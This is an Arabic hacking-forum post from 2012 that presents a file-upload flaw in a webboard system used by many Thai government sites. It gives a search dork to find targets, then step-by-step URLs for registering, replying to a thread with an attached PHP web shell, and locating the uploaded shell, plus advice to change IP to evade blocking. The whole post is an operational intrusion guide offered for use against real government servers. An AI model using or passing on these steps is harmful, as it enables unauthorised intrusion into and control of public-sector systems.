الموضوع: ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
عرض مشاركة واحدة
قديم 07-06-2012, 02:53 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
barbaros
 
الصورة الرمزية barbaros
 

 
 
إحصائية العضو





barbaros غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
barbaros is on a distinguished road
افتراضي ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)

السلام عليكم ورحمة الله وبركاته.

ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل

Dork:
كود:
site:go.th inurl:name=member+file=index
رابط التسجيل
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
نختار أحد المواضيع لنضيف الرد:

كود:
http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:


--------------------------------------------------------------------------

بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:





والرابط يكون مثل هذا:

كود:
http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php
مبروك !

ملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية

بالتوفيق


eyvm o'dvm ghojvhr hgl,hru hgp;,ldm (Webboard)

   

رد مع اقتباس